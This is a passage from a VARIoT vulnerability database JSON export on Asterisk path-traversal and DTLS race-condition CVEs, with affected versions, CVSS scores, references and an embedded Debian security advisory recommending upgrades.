],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-49294",
"trust": 2.8
},
{
"db": "JVNDB",
"id": "JVNDB-2023-020239",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "176383",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "177819",
"trust": 0.1
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "PACKETSTORM",
"id": "177819"
},
{
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"id": "VAR-202312-2340",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2024-03-30T22:40:30.232000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.0
},
{
"problemtype": "Path traversal (CWE-22) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://github.com/asterisk/asterisk/security/advisories/ghsa-8857-hfmw-vg8f"
},
{
"trust": 1.8,
"url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#l3757"
},
{
"trust": 1.8,
"url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
},
{
"trust": 1.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-49294"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-38703"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/asterisk"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-49786"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-37457"
},
{
"trust": 0.1,
"url": "https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/{cve_id}\\n\u0027,"
},
{
"trust": 0.1,
"url": "https://asterisk.org/"
},
{
"trust": 0.1,
"url": "https://docs.asterisk.org/asterisk_18_documentation/api_documentation/ami_actions/getconfig/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "PACKETSTORM",
"id": "177819"
},
{
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "PACKETSTORM",
"id": "177819"
},
{
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-01-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"date": "2024-01-05T14:31:02",
"db": "PACKETSTORM",
"id": "176383"
},
{
"date": "2024-03-28T14:16:21",
"db": "PACKETSTORM",
"id": "177819"
},
{
"date": "2023-12-14T20:15:52.730000",
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-01-16T02:49:00",
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"date": "2023-12-29T00:15:49.930000",
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Digium\u00a0 of \u00a0Asterisk\u00a0 Path traversal vulnerabilities in products from multiple vendors such as",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020239"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "info disclosure",
"sources": [
{
"db": "PACKETSTORM",
"id": "177819"
}
],
"trust": 0.1
}
}
VAR-202312-0487
Vulnerability from variot - Updated: 2024-02-01 22:52Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6. Digium of Asterisk Race condition vulnerabilities exist in products from multiple vendors.Service operation interruption (DoS) It may be in a state. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
Debian Security Advisory DSA-5596-1 security@debian.org https://www.debian.org/security/ Markus Koschany January 04, 2024 https://www.debian.org/security/faq
Package : asterisk CVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786 Debian Bug : 1059303 1059032 1059033
Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.
CVE-2023-37457
The 'update' functionality of the PJSIP_HEADER dialplan function can exceed
the available buffer space for storing the new value of a header. By doing
so this can overwrite memory or cause a crash. This is not externally
exploitable, unless dialplan is explicitly written to update a header based
on data from an outside source. If the 'update' functionality is not used
the vulnerability does not occur.
CVE-2023-38703
PJSIP is a free and open source multimedia communication library written in
C with high level API in C, C++, Java, C#, and Python languages. SRTP is a
higher level media transport which is stacked upon a lower level media
transport such as UDP and ICE. Currently a higher level transport is not
synchronized with its lower level transport that may introduce a
use-after-free issue. This vulnerability affects applications that have
SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media
transport other than UDP. This vulnerability’s impact may range from
unexpected application termination to control flow hijack/memory
corruption.
CVE-2023-49294
It is possible to read any arbitrary file even when the `live_dangerously`
option is not enabled.
For the oldstable distribution (bullseye), these problems have been fixed in version 1:16.28.0~dfsg-0+deb11u4.
We recommend that you upgrade your asterisk packages.
For the detailed security status of asterisk please refer to its security tracker page at: https://security-tracker.debian.org/tracker/asterisk
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----
iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7 UeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F Jtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl AZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b zejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk T5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb bhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu mN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh bRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ Qvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+ sxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU +k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202312-0487",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "18.20.1"
},
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "19.0.0"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "18.9"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "16.8.0"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "20.5.1"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "digium",
"version": "21.0.0"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "13.13.0"
},
{
"model": "certified asterisk",
"scope": null,
"trust": 0.8,
"vendor": "sangoma",
"version": null
},
{
"model": "asterisk",
"scope": null,
"trust": 0.8,
"vendor": "digium",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert5:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert10:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert11:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert12:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert5:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert6:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert7:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert8:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert9:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:21.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "18.20.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "20.5.1",
"versionStartIncluding": "19.0.0",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Debian",
"sources": [
{
"db": "PACKETSTORM",
"id": "176383"
}
],
"trust": 0.1
},
"cve": "CVE-2023-49786",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 5.9,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2023-49786",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-49786",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2023-49786",
"trust": 1.0,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"db": "NVD",
"id": "CVE-2023-49786"
},
{
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6. Digium of Asterisk Race condition vulnerabilities exist in products from multiple vendors.Service operation interruption (DoS) It may be in a state. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5596-1 security@debian.org\nhttps://www.debian.org/security/ Markus Koschany\nJanuary 04, 2024 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : asterisk\nCVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786\nDebian Bug : 1059303 1059032 1059033\n\nMultiple security vulnerabilities have been discovered in Asterisk, an Open\nSource Private Branch Exchange. \n\nCVE-2023-37457\n\n The \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed\n the available buffer space for storing the new value of a header. By doing\n so this can overwrite memory or cause a crash. This is not externally\n exploitable, unless dialplan is explicitly written to update a header based\n on data from an outside source. If the \u0027update\u0027 functionality is not used\n the vulnerability does not occur. \n\nCVE-2023-38703\n\n PJSIP is a free and open source multimedia communication library written in\n C with high level API in C, C++, Java, C#, and Python languages. SRTP is a\n higher level media transport which is stacked upon a lower level media\n transport such as UDP and ICE. Currently a higher level transport is not\n synchronized with its lower level transport that may introduce a\n use-after-free issue. This vulnerability affects applications that have\n SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media\n transport other than UDP. This vulnerability\u2019s impact may range from\n unexpected application termination to control flow hijack/memory\n corruption. \n\nCVE-2023-49294\n\n It is possible to read any arbitrary file even when the `live_dangerously`\n option is not enabled. \n\n\nFor the oldstable distribution (bullseye), these problems have been fixed\nin version 1:16.28.0~dfsg-0+deb11u4. \n\nWe recommend that you upgrade your asterisk packages. \n\nFor the detailed security status of asterisk please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/asterisk\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD\nRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7\nUeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F\nJtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl\nAZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b\nzejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk\nT5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb\nbhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu\nmN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh\nbRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ\nQvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+\nsxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU\n+k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-49786"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"db": "PACKETSTORM",
"id": "176383"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-49786",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "176251",
"trust": 1.8
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2023/12/15/7",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2023-024446",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "176383",
"trust": 0.1
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"id": "VAR-202312-0487",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2024-02-01T22:52:28.007000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-362",
"trust": 1.0
},
{
"problemtype": "Race condition (CWE-362) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "http://packetstormsecurity.com/files/176251/asterisk-20.1.0-denial-of-service.html"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2023/dec/24"
},
{
"trust": 1.8,
"url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
},
{
"trust": 1.8,
"url": "https://github.com/enablesecurity/advisories/tree/master/es2023-01-asterisk-dtls-hello-race"
},
{
"trust": 1.8,
"url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
},
{
"trust": 1.8,
"url": "https://github.com/asterisk/asterisk/security/advisories/ghsa-hxj9-xwr8-w8pq"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-49786"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-38703"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-49294"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/asterisk"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-37457"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-01-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"date": "2024-01-05T14:31:02",
"db": "PACKETSTORM",
"id": "176383"
},
{
"date": "2023-12-14T20:15:52.927000",
"db": "NVD",
